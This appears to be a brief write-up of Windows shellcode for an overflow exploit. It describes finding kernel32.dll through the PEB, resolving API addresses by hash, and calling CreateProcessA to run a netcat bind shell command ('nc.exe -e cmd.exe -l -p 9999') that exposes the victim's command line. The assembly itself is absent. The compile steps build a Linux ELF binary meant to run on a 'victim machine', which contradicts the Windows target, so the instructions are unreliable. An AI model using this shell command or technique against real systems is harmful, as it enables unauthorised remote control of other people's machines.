shellcode to exploit the overflow vulnerability on windows to get remote code execution.

shellcode to exploit the overflow vulnerability on windows to get remote code execution.

This shellcode is to exploit the overflow vulnerability on windows to get remote code execution
My shellcode does the following tasks:

1.To find the kernel32.dll address by making use of the Process Environment Block (PEB). Since we can find PEB address at fs:[0x30], and kernel32.dll is always the second module to be initialized, so we can use this knowledge to find the base address of kernel32.dll.

Debugging and finding the constants address from stack and Process A

Debugging and finding the constants address from stack and Process A

2.Next, my shellcode is going to make use of Export Directory Table (EDT) to find the Relative Virtual Address of the functions I need. As I know the function name hash of the functions I need, I can find the RVA of them in EDT. With the base address of kernel32.dll, we can get the absolute address of the functions I need.
– At last, as I know the address of the functions I am going to use, I can run these functions with my arguments to implement my exploit. In my shellcode, I use CreateProcessA function to run “nc.exe -e cmd.exe -l -p 9999” to access the commandline (DOS) of the victim. (Assume that netcat is already present on the target).

API Description
– CreateProcess function It is ued to create a new process and its primary thread. The new process runs in the security context of the calling process.

The structure is: BOOL WINAPI CreateProcess( In_opt LPCTSTR lpApplicationName, Inout_opt LPTSTR lpCommandLine, In_opt LPSECURITY_ATTRIBUTES lpProcessAttributes, In_opt LPSECURITY_ATTRIBUTES lpThreadAttributes, In BOOL bInheritHandles, In DWORD dwCreationFlags, In_opt LPVOID lpEnvironment, In_opt LPCTSTR lpCurrentDirectory, In LPSTARTUPINFO lpStartupInfo, Out LPPROCESS_INFORMATION lpProcessInformation );

Parameters: lpApplicationName is the name of the module to be executed. lpCommandLine is the command line to be executed. In my shellcode, I put “nc.exe -e cmd.exe -l -p 9999” in this parameter. lpProcessAttributes is a pointer to a SECURITY_ATTRIBUTES structure that determines whether the returned handle to the new process object can be inherited by child processes. lpThreadAttributes is a pointer to a SECURITY_ATTRIBUTES structure that determines whether the returned handle to the new thread object can be inherited by child processes. bInheritHandles: If this parameter TRUE, each inheritable handle in the calling process is inherited by the new process. If the parameter is FALSE, the handles are not inherited. dwCreationFlags control the priority class and the creation of the process. lpEnvironment is a pointer to the environment block for the new process. If this parameter is NULL, the new process uses the environment of the calling process. lpCurrentDirectory is The full path to the current directory for the process. lpStartupInfo is a pointer to a STARTUPINFO or STARTUPINFOEX structure. lpProcessInformation is a pointer to a PROCESS_INFORMATION structure that receives identification information about the new process.

ExitProcess Function It is used to end the calling process and all its threads.

The structure is: VOID WINAPI ExitProcess( In UINT uExitCode );
Parameter: uExitCode: The exit code for the process and all threads. It is usually set to 0.

Compile:

– nasm -f elf -o myshellcode.o myshellcode.asm
– ld -o myshellcode myshellcode.o
– ./myshellcode (your victim machine)

myshellcode.asm Script:

Source : https://github.com/bbterry